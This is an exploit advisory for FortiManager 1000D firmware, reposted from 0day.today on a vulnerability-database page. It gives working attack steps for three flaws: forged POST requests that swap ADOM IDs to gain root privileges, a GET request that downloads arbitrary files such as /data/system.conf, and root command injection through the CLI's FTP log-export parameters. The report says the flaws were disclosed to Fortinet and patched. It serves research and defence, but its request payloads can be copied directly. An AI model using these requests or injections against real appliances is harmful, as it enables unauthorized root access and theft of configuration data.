Lucene search
+L

Fortigate FortiManager 1000D Multiple Privilege Escalation Vulnerabilities

🗓️ 17 May 2015 00:00:00Reported by 0inType 
zdt
 zdt
🔗 0day.today👁 46 Views

FortiManager 1000D Privilege Escalation, File Download, and Local Privilege Escalation Vulnerabilitie

Code
# Date: 15 May,2015
# Exploit Author: Maksymilian Motyl (0in)
# Version: config-version=FMG1000D-5.2-FW-build0648-141114 

Product description ( http://www.fortinet.com/products/fortimanager/ ):
"FortiManager Security Management appliances allow you to centrally manage any number of Fortinet Network Security devices,from several to thousands, including FortiGate®, FortiWiFi™, and FortiCarrier™. 
Network administrators can better control their network by logically grouping devices into administrative domains (ADOMs), efficiently applying policies and distributing content security/firmware updates. 
FortiManager is one of several versatile Network Security Management Products that provide a diversity of deployment types, growth flexibility, advanced customization through APIs and simple licensing."
-------------------------------------------------------
1st vulnerability:
		ADOM/VDOM parameter manipulation
FortiManager improperly manages or does not verify user privileges. This situation lead to a possibility of manipulation of input parameters, which in next steps are used to profile/privilege identification.
At the first, I've discovered the possibility to enumerate existing VDOM nodes using above request:

POST /cgi-bin/module/dvm/DeviceAction?nocache=0.833147156983614 HTTP/1.1
action=load&type=devlist&adom=NONEXSISTING&ver=520&bkmode=0&devicePerm=0&csrf_token=PZMA%2BuRgwhYDYp6MXoHb8UVN76Rp1my

Above request result in infromation disclosure, attacker can retreive all VDOM ID's.

At this stage, I've assume that root ADOM node are presented under VDOM 3.
For this purpose, I've replacing ADOM parameters from 224 (user VDOM) to 3 (root VDOM, in my case of course) and go forward

POST /cgi-bin/module/dvm/DeviceAction
action=load&tyle=devlist&adom=224&ver=520&kbmode=0&devicePerm=0&csrf_token=STH

Now, *attacker* can operate as root user.

-------------------------------------------------------
2nd vulnerability:
Arbitrary file download

After jail-breaking the console of FortiManager, I've spent a few minutes on analysis of a GUI panel source codes, which are a collection a python based scripts based on django framework.
In {WEBROOT}proj/logview/urls.py file we can see the following line:
url(r'^fileDownload', 'download_file'),
Which corresponds to following code in {WEBROOT}proj/logview/views.py

@login_required
def download_file(request):
    """
    @brief Download file
    """

    file_path = request.GET["filepath"]
    original_filename = request.GET.get("filename", '')
    download_name = request.GET.get('download_name', original_filename)
    fileType = file_path[-3:]
    if(fileType == ".gz"):
        f = gzip.open(file_path, 'rb')
        response = HttpResponse(f.read(), mimetype='application/gzip')
        f.close()
    else:
        fp = open(file_path, 'rb')
        response = HttpResponse(fp.read(), mimetype='application/octet-stream')
        fp.close()

    response['content-disposition'] = 'attachment; filename="%s"' \
        % download_name.encode(settings.WEBPAGE_CHARSET)
    return response

This functionality can’t be found during the web crawling. This functionality is hidden for any customer of FortiManager...
PoC:
GET /p/logview/fileDownload?filepath=/data/system.conf&filename=conf&download_name=system

-------------------------------------------------------
3rd Vulnerability:
Local privilege escalation aka JailBreak.

Fortimanager cli console has a feature, where privileged administrator can backup his log over FTP connection.
For this purpose, he should connect via SSH to his management interface, and execute following command:
$ diagnose system export umlog ftp FILE_MASK IP_ADDRESS LOGIN PASSWORD
When user types above command, /bin/cli executes ftp_upload.sh script with typed arguments.

18399 root      9080 S N  {ftp_upload.sh} /bin/sh /fdsroot/bin/ftp_upload.sh IP_ADDRESS admin Storage bin data dev drive0 etc faz_upload fdsroot lib lib64 migadmin proc resource root rs sbin share sys tmp usr var /var/config/FILE_MASK_umlog.tar .
ftp_upload.sh script in next step will connect to IP_ADDRESS with previously provided LOGIN and PASSWORD 
/bin/cli program, not  properly validate the input provided by user, so it leads to code-injection as the root user. 
Code injection exist in:
-	FILE_MASK parameter
-	LOGIN parameter
-	PASSWORD parameter
In example, we can type `/bin/bash` as the argument and gain full access on the machine
http://oi60.tinypic.com/bf2vko.jpg


All vulnerabilities described in this report have been submitted to Fortinet in december 2014, fortinet have delivered the patch in february 2015.
Pentest scope was limited by time.

#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation